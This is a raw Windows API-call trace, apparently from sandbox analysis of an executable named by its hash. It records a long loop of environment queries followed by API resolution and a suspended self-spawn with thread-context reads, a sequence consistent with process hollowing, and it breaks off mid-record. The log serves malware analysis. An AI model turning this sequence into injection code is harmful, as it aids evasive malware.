0xffffffff [0069.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 0xffffffff [0069.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 0xffffffff [0069.859] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.859] GetSystemDefaultLangID () returned 0x2730409 [0069.859] GetThreadLocale () returned 0x409 [0069.859] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.860] GetSystemDefaultLangID () returned 0x2730409 [0069.860] GetThreadLocale () returned 0x409 [0069.860] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.860] GetSystemDefaultLangID () returned 0x2730409 [0069.860] GetThreadLocale () returned 0x409 [0069.860] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.860] GetSystemDefaultLangID () returned 0x2730409 [0069.860] GetThreadLocale () returned 0x409 [0069.860] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.860] GetSystemDefaultLangID () returned 0x2730409 [0069.860] GetThreadLocale () returned 0x409 [0069.860] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.860] GetSystemDefaultLangID () returned 0x2730409 [0069.860] GetThreadLocale () returned 0x409 [0069.860] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.860] GetSystemDefaultLangID () returned 0x2730409 [0069.860] GetThreadLocale () returned 0x409 [0069.860] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.860] GetSystemDefaultLangID () returned 0x2730409 [0069.860] GetThreadLocale () returned 0x409 [0069.860] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.860] GetSystemDefaultLangID () returned 0x2730409 [0069.860] GetThreadLocale () returned 0x409 [0069.860] GetCurrentProcess () returned 0xffffffff [0069.860] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.861] GetSystemDefaultLangID () returned 0x2730409 [0069.861] GetThreadLocale () returned 0x409 [0069.861] GetCurrentProcess () returned 0xffffffff [0069.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.861] GetSystemDefaultLangID () returned 0x2730409 [0069.861] GetThreadLocale () returned 0x409 [0069.861] GetCurrentProcess () returned 0xffffffff [0069.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.861] GetSystemDefaultLangID () returned 0x2730409 [0069.861] GetThreadLocale () returned 0x409 [0069.861] GetCurrentProcess () returned 0xffffffff [0069.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.861] GetSystemDefaultLangID () returned 0x2730409 [0069.861] GetThreadLocale () returned 0x409 [0069.861] GetCurrentProcess () returned 0xffffffff [0069.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.861] GetSystemDefaultLangID () returned 0x2730409 [0069.861] GetThreadLocale () returned 0x409 [0069.861] GetCurrentProcess () returned 0xffffffff [0069.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.861] GetSystemDefaultLangID () returned 0x2730409 [0069.861] GetThreadLocale () returned 0x409 [0069.861] GetCurrentProcess () returned 0xffffffff [0069.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.861] GetSystemDefaultLangID () returned 0x2730409 [0069.861] GetThreadLocale () returned 0x409 [0069.861] GetCurrentProcess () returned 0xffffffff [0069.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.861] GetSystemDefaultLangID () returned 0x2730409 [0069.861] GetThreadLocale () returned 0x409 [0069.861] GetCurrentProcess () returned 0xffffffff [0069.861] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.862] GetSystemDefaultLangID () returned 0x2730409 [0069.862] GetThreadLocale () returned 0x409 [0069.862] GetCurrentProcess () returned 0xffffffff [0069.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.862] GetSystemDefaultLangID () returned 0x2730409 [0069.862] GetThreadLocale () returned 0x409 [0069.862] GetCurrentProcess () returned 0xffffffff [0069.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.862] GetSystemDefaultLangID () returned 0x2730409 [0069.862] GetThreadLocale () returned 0x409 [0069.862] GetCurrentProcess () returned 0xffffffff [0069.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.862] GetSystemDefaultLangID () returned 0x2730409 [0069.862] GetThreadLocale () returned 0x409 [0069.862] GetCurrentProcess () returned 0xffffffff [0069.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.862] GetSystemDefaultLangID () returned 0x2730409 [0069.862] GetThreadLocale () returned 0x409 [0069.862] GetCurrentProcess () returned 0xffffffff [0069.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.862] GetSystemDefaultLangID () returned 0x2730409 [0069.862] GetThreadLocale () returned 0x409 [0069.862] GetCurrentProcess () returned 0xffffffff [0069.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.862] GetSystemDefaultLangID () returned 0x2730409 [0069.862] GetThreadLocale () returned 0x409 [0069.862] GetCurrentProcess () returned 0xffffffff [0069.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.862] GetSystemDefaultLangID () returned 0x2730409 [0069.862] GetThreadLocale () returned 0x409 [0069.862] GetCurrentProcess () returned 0xffffffff [0069.862] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.863] GetSystemDefaultLangID () returned 0x2730409 [0069.863] GetThreadLocale () returned 0x409 [0069.863] GetCurrentProcess () returned 0xffffffff [0069.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.863] GetSystemDefaultLangID () returned 0x2730409 [0069.863] GetThreadLocale () returned 0x409 [0069.863] GetCurrentProcess () returned 0xffffffff [0069.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.863] GetSystemDefaultLangID () returned 0x2730409 [0069.863] GetThreadLocale () returned 0x409 [0069.863] GetCurrentProcess () returned 0xffffffff [0069.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.863] GetSystemDefaultLangID () returned 0x2730409 [0069.863] GetThreadLocale () returned 0x409 [0069.863] GetCurrentProcess () returned 0xffffffff [0069.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.863] GetSystemDefaultLangID () returned 0x2730409 [0069.863] GetThreadLocale () returned 0x409 [0069.863] GetCurrentProcess () returned 0xffffffff [0069.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.863] GetSystemDefaultLangID () returned 0x2730409 [0069.863] GetThreadLocale () returned 0x409 [0069.863] GetCurrentProcess () returned 0xffffffff [0069.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.863] GetSystemDefaultLangID () returned 0x2730409 [0069.863] GetThreadLocale () returned 0x409 [0069.863] GetCurrentProcess () returned 0xffffffff [0069.863] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.864] GetSystemDefaultLangID () returned 0x2730409 [0069.864] GetThreadLocale () returned 0x409 [0069.864] GetCurrentProcess () returned 0xffffffff [0069.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.864] GetSystemDefaultLangID () returned 0x2730409 [0069.864] GetThreadLocale () returned 0x409 [0069.864] GetCurrentProcess () returned 0xffffffff [0069.864] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.864] GetSystemDefaultLangID () returned 0x2730409 [0069.864] GetThreadLocale () returned 0x409 [0069.864] GetCurrentProcess () returned 0xffffffff [0069.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.865] GetSystemDefaultLangID () returned 0x2730409 [0069.865] GetThreadLocale () returned 0x409 [0069.865] GetCurrentProcess () returned 0xffffffff [0069.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.865] GetSystemDefaultLangID () returned 0x2730409 [0069.865] GetThreadLocale () returned 0x409 [0069.865] GetCurrentProcess () returned 0xffffffff [0069.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.865] GetSystemDefaultLangID () returned 0x2730409 [0069.865] GetThreadLocale () returned 0x409 [0069.865] GetCurrentProcess () returned 0xffffffff [0069.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.865] GetSystemDefaultLangID () returned 0x2730409 [0069.865] GetThreadLocale () returned 0x409 [0069.865] GetCurrentProcess () returned 0xffffffff [0069.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.865] GetSystemDefaultLangID () returned 0x2730409 [0069.865] GetThreadLocale () returned 0x409 [0069.865] GetCurrentProcess () returned 0xffffffff [0069.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.865] GetSystemDefaultLangID () returned 0x2730409 [0069.865] GetThreadLocale () returned 0x409 [0069.865] GetCurrentProcess () returned 0xffffffff [0069.865] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.866] GetSystemDefaultLangID () returned 0x2730409 [0069.866] GetThreadLocale () returned 0x409 [0069.866] GetCurrentProcess () returned 0xffffffff [0069.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.866] GetSystemDefaultLangID () returned 0x2730409 [0069.866] GetThreadLocale () returned 0x409 [0069.866] GetCurrentProcess () returned 0xffffffff [0069.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.866] GetSystemDefaultLangID () returned 0x2730409 [0069.866] GetThreadLocale () returned 0x409 [0069.866] GetCurrentProcess () returned 0xffffffff [0069.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.866] GetSystemDefaultLangID () returned 0x2730409 [0069.866] GetThreadLocale () returned 0x409 [0069.866] GetCurrentProcess () returned 0xffffffff [0069.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.866] GetSystemDefaultLangID () returned 0x2730409 [0069.866] GetThreadLocale () returned 0x409 [0069.866] GetCurrentProcess () returned 0xffffffff [0069.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.866] GetSystemDefaultLangID () returned 0x2730409 [0069.866] GetThreadLocale () returned 0x409 [0069.866] GetCurrentProcess () returned 0xffffffff [0069.866] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.866] GetSystemDefaultLangID () returned 0x2730409 [0069.866] GetThreadLocale () returned 0x409 [0069.867] GetCurrentProcess () returned 0xffffffff [0069.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.867] GetSystemDefaultLangID () returned 0x2730409 [0069.867] GetThreadLocale () returned 0x409 [0069.867] GetCurrentProcess () returned 0xffffffff [0069.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.867] GetSystemDefaultLangID () returned 0x2730409 [0069.867] GetThreadLocale () returned 0x409 [0069.867] GetCurrentProcess () returned 0xffffffff [0069.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.867] GetSystemDefaultLangID () returned 0x2730409 [0069.867] GetThreadLocale () returned 0x409 [0069.867] GetCurrentProcess () returned 0xffffffff [0069.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.867] GetSystemDefaultLangID () returned 0x2730409 [0069.867] GetThreadLocale () returned 0x409 [0069.867] GetCurrentProcess () returned 0xffffffff [0069.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.867] GetSystemDefaultLangID () returned 0x2730409 [0069.867] GetThreadLocale () returned 0x409 [0069.867] GetCurrentProcess () returned 0xffffffff [0069.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.867] GetSystemDefaultLangID () returned 0x2730409 [0069.867] GetThreadLocale () returned 0x409 [0069.867] GetCurrentProcess () returned 0xffffffff [0069.867] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.868] GetSystemDefaultLangID () returned 0x2730409 [0069.868] GetThreadLocale () returned 0x409 [0069.868] GetCurrentProcess () returned 0xffffffff [0069.868] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.868] GetSystemDefaultLangID () returned 0x2730409 [0069.868] GetThreadLocale () returned 0x409 [0069.868] GetCurrentProcess () returned 0xffffffff [0069.868] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.868] GetSystemDefaultLangID () returned 0x2730409 [0069.868] GetThreadLocale () returned 0x409 [0069.868] GetCurrentProcess () returned 0xffffffff [0069.868] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.868] GetSystemDefaultLangID () returned 0x2730409 [0069.868] GetThreadLocale () returned 0x409 [0069.868] GetCurrentProcess () returned 0xffffffff [0069.868] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.868] GetSystemDefaultLangID () returned 0x2730409 [0069.868] GetThreadLocale () returned 0x409 [0069.868] GetCurrentProcess () returned 0xffffffff [0069.868] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.868] GetSystemDefaultLangID () returned 0x2730409 [0069.868] GetThreadLocale () returned 0x409 [0069.868] GetCurrentProcess () returned 0xffffffff [0069.868] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.868] GetSystemDefaultLangID () returned 0x2730409 [0069.868] GetThreadLocale () returned 0x409 [0069.868] GetCurrentProcess () returned 0xffffffff [0069.868] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.868] GetSystemDefaultLangID () returned 0x2730409 [0069.868] GetThreadLocale () returned 0x409 [0069.869] GetCurrentProcess () returned 0xffffffff [0069.869] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.869] GetSystemDefaultLangID () returned 0x2730409 [0069.869] GetThreadLocale () returned 0x409 [0069.869] GetCurrentProcess () returned 0xffffffff [0069.869] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.869] GetSystemDefaultLangID () returned 0x2730409 [0069.869] GetThreadLocale () returned 0x409 [0069.869] GetCurrentProcess () returned 0xffffffff [0069.869] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.869] GetSystemDefaultLangID () returned 0x2730409 [0069.869] GetThreadLocale () returned 0x409 [0069.869] GetCurrentProcess () returned 0xffffffff [0069.869] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.869] GetSystemDefaultLangID () returned 0x2730409 [0069.869] GetThreadLocale () returned 0x409 [0069.869] GetCurrentProcess () returned 0xffffffff [0069.869] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.869] GetSystemDefaultLangID () returned 0x2730409 [0069.869] GetThreadLocale () returned 0x409 [0069.869] GetCurrentProcess () returned 0xffffffff [0069.869] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.869] GetSystemDefaultLangID () returned 0x2730409 [0069.869] GetThreadLocale () returned 0x409 [0069.869] GetCurrentProcess () returned 0xffffffff [0069.869] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.869] GetSystemDefaultLangID () returned 0x2730409 [0069.869] GetThreadLocale () returned 0x409 [0069.869] GetCurrentProcess () returned 0xffffffff [0069.869] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.869] GetSystemDefaultLangID () returned 0x2730409 [0069.869] GetThreadLocale () returned 0x409 [0069.870] GetCurrentProcess () returned 0xffffffff [0069.870] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.870] GetSystemDefaultLangID () returned 0x2730409 [0069.870] GetThreadLocale () returned 0x409 [0069.870] GetCurrentProcess () returned 0xffffffff [0069.870] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.870] GetSystemDefaultLangID () returned 0x2730409 [0069.870] GetThreadLocale () returned 0x409 [0069.870] GetCurrentProcess () returned 0xffffffff [0069.870] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.870] GetSystemDefaultLangID () returned 0x2730409 [0069.870] GetThreadLocale () returned 0x409 [0069.870] GetCurrentProcess () returned 0xffffffff [0069.870] GetProcessHandleCount (in: hProcess=0x0, pdwHandleCount=0x0 | out: pdwHandleCount=0x0) returned 0 [0069.870] GetSystemDefaultLangID () returned 0x2730409 [0069.870] GetThreadLocale () returned 0x409 [0070.647] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x752b0000 [0070.647] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtect") returned 0x752c4317 [0070.647] VirtualProtect (in: lpAddress=0x210020, dwSize=0x91100, flNewProtect=0x40, lpflOldProtect=0x18e818 | out: lpflOldProtect=0x18e818*=0x4) returned 1 [0070.786] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x752b0000 [0070.787] GetProcAddress (hModule=0x752b0000, lpProcName="GlobalAlloc") returned 0x752c5846 [0070.787] GetProcAddress (hModule=0x752b0000, lpProcName="GetLastError") returned 0x752c11c0 [0070.787] GetProcAddress (hModule=0x752b0000, lpProcName="Sleep") returned 0x752c10ff [0070.787] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0070.787] GetProcAddress (hModule=0x752b0000, lpProcName="CreateToolhelp32Snapshot") returned 0x752e7327 [0070.787] GetProcAddress (hModule=0x752b0000, lpProcName="Module32First") returned 0x75346279 [0070.787] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0070.787] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x5c [0070.790] Module32First (hSnapshot=0x5c, lpme=0x18e5a4) returned 1 [0070.793] VirtualAlloc (lpAddress=0x0, dwSize=0x11a5a0, flAllocationType=0x1000, flProtect=0x40) returned 0x3db0000 [0070.848] LoadLibraryA (lpLibFileName="user32") returned 0x76860000 [0070.848] GetProcAddress (hModule=0x76860000, lpProcName="MessageBoxA") returned 0x768cfd1e [0070.848] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageExtraInfo") returned 0x7689ed76 [0070.848] LoadLibraryA (lpLibFileName="kernel32") returned 0x752b0000 [0070.848] GetProcAddress (hModule=0x752b0000, lpProcName="WinExec") returned 0x75343051 [0070.848] GetProcAddress (hModule=0x752b0000, lpProcName="CreateFileA") returned 0x752c537e [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="WriteFile") returned 0x752c1282 [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="CloseHandle") returned 0x752c13f0 [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="CreateProcessA") returned 0x752c1072 [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="GetThreadContext") returned 0x752e799c [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAlloc") returned 0x752c1836 [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualAllocEx") returned 0x752dd980 [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualFree") returned 0x752c184e [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="ReadProcessMemory") returned 0x752dcfa4 [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="WriteProcessMemory") returned 0x752dd9b0 [0070.849] GetProcAddress (hModule=0x752b0000, lpProcName="SetThreadContext") returned 0x75345933 [0070.850] GetProcAddress (hModule=0x752b0000, lpProcName="ResumeThread") returned 0x752c43a7 [0070.850] GetProcAddress (hModule=0x752b0000, lpProcName="WaitForSingleObject") returned 0x752c1136 [0070.850] GetProcAddress (hModule=0x752b0000, lpProcName="GetModuleFileNameA") returned 0x752c1491 [0070.850] GetProcAddress (hModule=0x752b0000, lpProcName="GetCommandLineA") returned 0x752c5159 [0070.850] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x76f00000 [0070.858] GetProcAddress (hModule=0x76f00000, lpProcName="NtUnmapViewOfSection") returned 0x76f1fc70 [0070.858] GetProcAddress (hModule=0x76f00000, lpProcName="NtWriteVirtualMemory") returned 0x76f1fe04 [0070.858] GetProcAddress (hModule=0x76860000, lpProcName="RegisterClassExA") returned 0x7687db98 [0070.858] GetProcAddress (hModule=0x76860000, lpProcName="CreateWindowExA") returned 0x7687d22e [0070.858] GetProcAddress (hModule=0x76860000, lpProcName="PostMessageA") returned 0x76883baa [0070.859] GetProcAddress (hModule=0x76860000, lpProcName="GetMessageA") returned 0x76877bd3 [0070.859] GetProcAddress (hModule=0x76860000, lpProcName="DefWindowProcA") returned 0x76f424e0 [0070.859] GetProcAddress (hModule=0x752b0000, lpProcName="GetFileAttributesA") returned 0x752c53cc [0070.859] GetProcAddress (hModule=0x752b0000, lpProcName="GetStartupInfoA") returned 0x752c0e00 [0070.859] GetProcAddress (hModule=0x752b0000, lpProcName="VirtualProtectEx") returned 0x75344b5f [0070.859] GetProcAddress (hModule=0x752b0000, lpProcName="ExitProcess") returned 0x752c79c8 [0070.859] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0070.860] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0070.860] GetFileAttributesA (lpFileName="apfHQ" (normalized: "c:\\users\\keecfmwgj\\desktop\\apfhq")) returned 0xffffffff [0070.860] RegisterClassExA (param_1=0x18e260) returned 0x25c1c9 [0070.862] CreateWindowExA (dwExStyle=0x200, lpClassName="saodkfnosa9uin", lpWindowName="mfoaskdfnoa", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x80060 [0071.646] PostMessageA (hWnd=0x80060, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0071.646] GetMessageA (in: lpMsg=0x18e290, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x18e290) returned 1 [0071.647] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x2b0000 [0071.647] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2b0000, nSize=0x2800 | out: lpFilename="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe")) returned 0x5f [0071.648] GetStartupInfoA (in: lpStartupInfo=0x18e1b4 | out: lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0071.648] GetCommandLineA () returned="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" " [0071.648] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18e1b4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff), lpProcessInformation=0x18e20c | out: lpCommandLine="\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" ", lpProcessInformation=0x18e20c*(hProcess=0x78, hThread=0x74, dwProcessId=0xea0, dwThreadId=0xea4)) returned 1 [0071.667] VirtualFree (lpAddress=0x2b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.668] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x2b0000 [0071.669] GetThreadContext (in: hThread=0x74, lpContext=0x2b0000 | out: lpContext=0x2b0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, 